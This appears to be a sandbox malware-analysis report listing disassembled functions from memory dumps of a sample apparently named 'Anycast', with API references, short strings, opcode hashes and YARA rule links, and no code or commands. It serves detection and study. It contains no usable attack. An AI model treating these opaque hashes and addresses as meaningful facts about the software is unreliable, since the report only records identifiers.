                                                                                                                              • Source File: 0000002B.00000002.4465300679.0000000006E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E20000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6e20000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: c5083bf07cf2cad8841865ce6b65be37222dd4545cc29a59dca864f138f5f2e9
                                                                                                                              • Instruction ID: 69697df990fa186040e268971417e7ca4983e5b1b75f9292e37e2b166047a171
                                                                                                                              • Opcode Fuzzy Hash: c5083bf07cf2cad8841865ce6b65be37222dd4545cc29a59dca864f138f5f2e9
                                                                                                                              • Instruction Fuzzy Hash: 6F31E3B0D00258DFCB24DF99D984A9EBFF6BF48310F24805AE408A7350C774A981CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 017AC4D4 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 017ACC84
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4451304972.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_17a0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CacheFlushResolver
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3435657375-0
                                                                                                                              • Opcode ID: fd1699181e44d73c94a3c7941babf16d23467e7eb6971c59d3cb4665fd31974c
                                                                                                                              • Instruction ID: 5718d8493fec517e5bbdc47eab18dd9bb4fe4210e4e2c989fca1e0338fb1aaee
                                                                                                                              • Opcode Fuzzy Hash: fd1699181e44d73c94a3c7941babf16d23467e7eb6971c59d3cb4665fd31974c
                                                                                                                              • Instruction Fuzzy Hash: 681100B58007499FCB20EF9AC544B9EFBF4EB48324F208459D519A7350D378A944CFE1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 017ACC21 Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 017ACC84
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4451304972.00000000017A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_17a0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CacheFlushResolver
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3435657375-0
                                                                                                                              • Opcode ID: 9ee362adcb5a17b052a0f88c48ee0ebfb913cd054d0e707e6a6b5e37f0081b90
                                                                                                                              • Instruction ID: b77d03c4ff2e9adca15e660e094e26bad21d7166c8ea0707ad63dec661a51096
                                                                                                                              • Opcode Fuzzy Hash: 9ee362adcb5a17b052a0f88c48ee0ebfb913cd054d0e707e6a6b5e37f0081b90
                                                                                                                              • Instruction Fuzzy Hash: EA11FEB58046489FCB20DFAAD584B9EBFF4EB49324F208459D559A3250C338A544CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06DA3430 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4464492494.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6da0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: +N
                                                                                                                              • API String ID: 0-52757858
                                                                                                                              • Opcode ID: 6462b9bf1c2a21639622288d573edf561d60268521667529125656f1b4822651
                                                                                                                              • Instruction ID: bc3c3393511c8cec9048c59d1021f273bd70c21062c9f706d748742ee1b77e74
                                                                                                                              • Opcode Fuzzy Hash: 6462b9bf1c2a21639622288d573edf561d60268521667529125656f1b4822651
                                                                                                                              • Instruction Fuzzy Hash: 9B916234B042018FDB58CF69D994AAABBF7EF88310F1945A8E446DB3A5DB35DD40CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC2B50 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq
                                                                                                                              • API String ID: 0-600464949
                                                                                                                              • Opcode ID: 593f8e56112e5a90847c259cc1de67946e67182bd494189f4699fbdf1fa29db0
                                                                                                                              • Instruction ID: acc2c15aba456f99ac5d325eef494102452cedc2de26b92b1997d97464681831
                                                                                                                              • Opcode Fuzzy Hash: 593f8e56112e5a90847c259cc1de67946e67182bd494189f4699fbdf1fa29db0
                                                                                                                              • Instruction Fuzzy Hash: DC81BC35B502148FDB549F69C894BAE7BF6EF89710F2580A9E906DB3A1DA30DD02CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C32F628 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: L<=p
                                                                                                                              • API String ID: 0-3877248495
                                                                                                                              • Opcode ID: 4675ade5b7f2b001e63492c0a32df84a716659a349ee6bcfe028eda95bbc8023
                                                                                                                              • Instruction ID: e64b41ffcd6432156816b734a3603b3d5ff6aa074cfb15a9cfb991ecc45b1c7d
                                                                                                                              • Opcode Fuzzy Hash: 4675ade5b7f2b001e63492c0a32df84a716659a349ee6bcfe028eda95bbc8023
                                                                                                                              • Instruction Fuzzy Hash: AB619F31B101158FCF14DFB9D994A6EBBFAEF88604B208529D406EB394DF71AC06CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCCCC68 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4c]q
                                                                                                                              • API String ID: 0-1015785248
                                                                                                                              • Opcode ID: a3d9f4a76ae5bb61bc391d5346ebf653bcf0784a56b2eef6694d149c6a58f742
                                                                                                                              • Instruction ID: 429e1bf726c0d61f900000b08b8dfc7325270d255165f35e9a7de29507ede2ab
                                                                                                                              • Opcode Fuzzy Hash: a3d9f4a76ae5bb61bc391d5346ebf653bcf0784a56b2eef6694d149c6a58f742
                                                                                                                              • Instruction Fuzzy Hash: C8616F75B001059FCF04DFA9C8D0AA9BBB6FF89300F64866DE9099B255DB31ED85CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C324000 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 4 `q
                                                                                                                              • API String ID: 0-616553479
                                                                                                                              • Opcode ID: d4fd39bd1c36dfa82397d728ae33ffd6dbbaf5091e168c548a5932f819c61906
                                                                                                                              • Instruction ID: 07324fca97bbda88981ff0f599f807c14bfac42cfdbaeb314ca0950ebd5dd9d9
                                                                                                                              • Opcode Fuzzy Hash: d4fd39bd1c36dfa82397d728ae33ffd6dbbaf5091e168c548a5932f819c61906
                                                                                                                              • Instruction Fuzzy Hash: AC51AF30B002159FCF19DF78D854AAEBBB6FF84304F1489ADC0169B2A5EB35AD45CB81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06DAD558 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4464492494.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_6da0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: TJbq
                                                                                                                              • API String ID: 0-1760495472
                                                                                                                              • Opcode ID: 426e21c99b5ea0bf9dcb08a6138e7a29281389fb95a557d81730e2915f9f1730
                                                                                                                              • Instruction ID: 90b1a0909d8ebb15fc9107048622d2fda49ba6cd3c8f9c21c0e2dd0f9c58d9ac
                                                                                                                              • Opcode Fuzzy Hash: 426e21c99b5ea0bf9dcb08a6138e7a29281389fb95a557d81730e2915f9f1730
                                                                                                                              • Instruction Fuzzy Hash: B2516E74A402098FCB09DF68D9948EEBBF6FF892107144599E446EB361DB35ED05CFA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C32CDA8 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq
                                                                                                                              • API String ID: 0-600464949
                                                                                                                              • Opcode ID: 35973d39b0a626ab4817d101787e605e3fcd01abdea77c3de0ea066f2dbe2688
                                                                                                                              • Instruction ID: 5ae23928370ba7d764cb189b12b791c99fd394f466f74e37d225ac3d4fcc2067
                                                                                                                              • Opcode Fuzzy Hash: 35973d39b0a626ab4817d101787e605e3fcd01abdea77c3de0ea066f2dbe2688
                                                                                                                              • Instruction Fuzzy Hash: AB51F5353147518FDB25CF38E454A5ABBFAEFC9300B18C669D44A8B766DA34EC06CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC1C98 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: xaq
                                                                                                                              • API String ID: 0-793007810
                                                                                                                              • Opcode ID: 41542bcd6ca80a086f93ba7336d5e4d6639ed0f77f823e27799a536a5b9f72c8
                                                                                                                              • Instruction ID: 7812144ae0e78cb7b83c802afbc71fd2f825c79e3929388f7223f671ebd39584
                                                                                                                              • Opcode Fuzzy Hash: 41542bcd6ca80a086f93ba7336d5e4d6639ed0f77f823e27799a536a5b9f72c8
                                                                                                                              • Instruction Fuzzy Hash: 085191347002059FDB19DF69C894BAE77A6FF88314F24856CE40A8B3A5CB32EC46CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C32F288 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (Abq
                                                                                                                              • API String ID: 0-1163130805
                                                                                                                              • Opcode ID: eac4542deacd85814131f9222013883a468be502aab8bba932d84ec4466cfecc
                                                                                                                              • Instruction ID: 40515c054a3bf5426c38113f17bdf358d1faea6cf66651d9d642187e876d365b
                                                                                                                              • Opcode Fuzzy Hash: eac4542deacd85814131f9222013883a468be502aab8bba932d84ec4466cfecc
                                                                                                                              • Instruction Fuzzy Hash: 9D414F70B202299FDF14DFB5D954AAEBBB6BF88240F108529E416AB354DF749C05CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC2448 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq
                                                                                                                              • API String ID: 0-600464949
                                                                                                                              • Opcode ID: 9e5e2fc4efafcf4086158e95bc39ed471f1794f94f53c31163f40f0b56655f1d
                                                                                                                              • Instruction ID: 487de7281296d579e3ef8bb918913fa89b8e19d4d6569754a9b93d741142510d
                                                                                                                              • Opcode Fuzzy Hash: 9e5e2fc4efafcf4086158e95bc39ed471f1794f94f53c31163f40f0b56655f1d
                                                                                                                              • Instruction Fuzzy Hash: 9541B231B002498FCB05DF68E8A4ADE7BF9EF89300F148169E4059B366DB789D06CBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C328A08 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 11a3f3e189f355e4a90fb884ed72f05a8c5f455462d6d7182a9b4e07cdba3f2d
                                                                                                                              • Instruction ID: 92e22901db1b2b9eb0bdf76f31edf88ea2dc8f0f7bd71a268b881eb742c38b06
                                                                                                                              • Opcode Fuzzy Hash: 11a3f3e189f355e4a90fb884ed72f05a8c5f455462d6d7182a9b4e07cdba3f2d
                                                                                                                              • Instruction Fuzzy Hash: 08514D30A11209DFDF18EFA0E954BAEBBB6FF85300F208569E4065B795CB399C45CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C32F298 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (Abq
                                                                                                                              • API String ID: 0-1163130805
                                                                                                                              • Opcode ID: 92737fb4bcc12b567eb19e47ab5d529a3ae8cd7eb465c308a43c6e04d3520e28
                                                                                                                              • Instruction ID: 14067b7ef581fa75a96bbf0d28b21d3f5b4e20d1ce608d649c3f5c81e18aafd8
                                                                                                                              • Opcode Fuzzy Hash: 92737fb4bcc12b567eb19e47ab5d529a3ae8cd7eb465c308a43c6e04d3520e28
                                                                                                                              • Instruction Fuzzy Hash: FE413F30B202299FDF18DFB5D954AAEBBB6BF88200F108529E406AB354DF749C05CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC38AA Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ,aq
                                                                                                                              • API String ID: 0-3092978723
                                                                                                                              • Opcode ID: 7ad19e21c1bba01ae8f851c968a8e1d391972814dcf54bf3a43e7660504fe979
                                                                                                                              • Instruction ID: c8830b71a572bdfec4a5cf73cd8f50c14d9f69cb10bd87503f08c4774bb80f1a
                                                                                                                              • Opcode Fuzzy Hash: 7ad19e21c1bba01ae8f851c968a8e1d391972814dcf54bf3a43e7660504fe979
                                                                                                                              • Instruction Fuzzy Hash: 5741CF707002558FCB55DF79E888AAEBBFAAF85200F048569E546C7365DB34D90ACB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C327DAF Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq
                                                                                                                              • API String ID: 0-600464949
                                                                                                                              • Opcode ID: 9a162b75cb829ca1b1a535e9438bb6460a211cdb4600019d6b75650b74265ab2
                                                                                                                              • Instruction ID: 435b7a070ada648dcee8e3cffcce9c98141b20ff889f24985b64123805c9e23f
                                                                                                                              • Opcode Fuzzy Hash: 9a162b75cb829ca1b1a535e9438bb6460a211cdb4600019d6b75650b74265ab2
                                                                                                                              • Instruction Fuzzy Hash: EF412935B106158FDB14CF19C4849AAB7F2FF8A314B25C699D45AAB361CB30E841CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C327D90 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq
                                                                                                                              • API String ID: 0-600464949
                                                                                                                              • Opcode ID: ba6d23036ee036f1df63e87ab684fa5db117f06b808ec8c954277fd36dcdde75
                                                                                                                              • Instruction ID: 00e7551453019e860395f2e1dcb592dfe0d99e6bf59cf2be0ec89f02428dcfc3
                                                                                                                              • Opcode Fuzzy Hash: ba6d23036ee036f1df63e87ab684fa5db117f06b808ec8c954277fd36dcdde75
                                                                                                                              • Instruction Fuzzy Hash: 92416A35B106558FDB15CF19C4809AAFBF2FF8A314B25C659D55A9B361CB30E802CF50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC9CA0 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq
                                                                                                                              • API String ID: 0-600464949
                                                                                                                              • Opcode ID: 81aee06f31cee7801fd9c6491f844bff3deb197b251818d2210957d67445f470
                                                                                                                              • Instruction ID: e6cf431b7d3a5fa541a636cc8de84bc52f57917f2523028431cdcaab6d33cad2
                                                                                                                              • Opcode Fuzzy Hash: 81aee06f31cee7801fd9c6491f844bff3deb197b251818d2210957d67445f470
                                                                                                                              • Instruction Fuzzy Hash: 6D418A35B006058FDB14CF19C080AAAB7F2FF89315B258A9DD856EB351DB30E902CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0CCC9CBF Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4473804634.000000000CCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0CCC0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_ccc0000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq
                                                                                                                              • API String ID: 0-600464949
                                                                                                                              • Opcode ID: 6815bc89760a6fa8437dd032bd9679874587287b2256ab9a5582eb5225dd7d29
                                                                                                                              • Instruction ID: 47043697499213f11979297ade2850e8d58d19cb9c02d07fd9e2fb12bc774b1e
                                                                                                                              • Opcode Fuzzy Hash: 6815bc89760a6fa8437dd032bd9679874587287b2256ab9a5582eb5225dd7d29
                                                                                                                              • Instruction Fuzzy Hash: 7A416A34B006098FCB14CF69C48496ABBF2FF89311B25C6ADD85AAB351DB30E801CB94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C3289D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: a6e95deb380aa3a22eead1d60c671aa17a9903716029d6095f3ab2747fe4f0bf
                                                                                                                              • Instruction ID: 5973719a63da5a23b1e7cda2c730fef000428e5425ef9a57c547af546f08a015
                                                                                                                              • Opcode Fuzzy Hash: a6e95deb380aa3a22eead1d60c671aa17a9903716029d6095f3ab2747fe4f0bf
                                                                                                                              • Instruction Fuzzy Hash: 56417C30A123099FDB19DFB0E56479EBB72FF81304F20856DD0065B7A5CA399946CB82
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C3282C8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ,aq
                                                                                                                              • API String ID: 0-3092978723
                                                                                                                              • Opcode ID: ee14daf5235f74df680b2770ae9e1440426920d94cc3051edc0c3398097c0cc2
                                                                                                                              • Instruction ID: ef0657a436ada19f01cdfe67a0a70b0a723ca5e5f45cb7191d9d2b5f0a50b26b
                                                                                                                              • Opcode Fuzzy Hash: ee14daf5235f74df680b2770ae9e1440426920d94cc3051edc0c3398097c0cc2
                                                                                                                              • Instruction Fuzzy Hash: 6F316C35B0021A8FCB44DBADE8447AEBBF9EB84314F2440A9D209D7291EB759905CBD1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C3289F8 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: a63f23c9e6ceec1597bd97428d6e6d950daa0c6b02d990464b9bc0bc55d1c68a
                                                                                                                              • Instruction ID: ea29c9dfccbed0b10a90c80b4af3c5d89e3ed8138c0fbc5f964809d32ac76033
                                                                                                                              • Opcode Fuzzy Hash: a63f23c9e6ceec1597bd97428d6e6d950daa0c6b02d990464b9bc0bc55d1c68a
                                                                                                                              • Instruction Fuzzy Hash: 6A312C30A11209DBDF18EFA0E554B9EBB76FF85304F608529D4065B7A8CF799845CB82
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C323216 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq
                                                                                                                              • API String ID: 0-600464949
                                                                                                                              • Opcode ID: 636d47650367f7a0ef9c051622b8bc7f088c90567793df2d1a4914c49f1c4c69
                                                                                                                              • Instruction ID: 4e8459cd0077f96df9610b2c50030796406bfd801af35581c16047b75a4a0a80
                                                                                                                              • Opcode Fuzzy Hash: 636d47650367f7a0ef9c051622b8bc7f088c90567793df2d1a4914c49f1c4c69
                                                                                                                              • Instruction Fuzzy Hash: 5021F6317042549FCB569F68D45495ABFA5EF86310B2680EAD404CF263CB25EC06CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C3229A3 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_43_2_c320000_Anycast.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (aq
                                                                                                                              • API String ID: 0-600464949
                                                                                                                              • Opcode ID: 0fed05fa40253ed76f4d0fd52191d9f49cf47609164010d6c5702d50f55c563e
                                                                                                                              • Instruction ID: 58757c0be99e51e926a58196b56b9b829be8744f9170f7622808e2dd12f4aae7
                                                                                                                              • Opcode Fuzzy Hash: 0fed05fa40253ed76f4d0fd52191d9f49cf47609164010d6c5702d50f55c563e
                                                                                                                              • Instruction Fuzzy Hash: E421F1357082549FCB06DF28E81486EBBB6EFC931071540AAE845DB3A5DF31CD12CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0C3259D0 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000002B.00000002.4472941801.000000000C320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C320000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
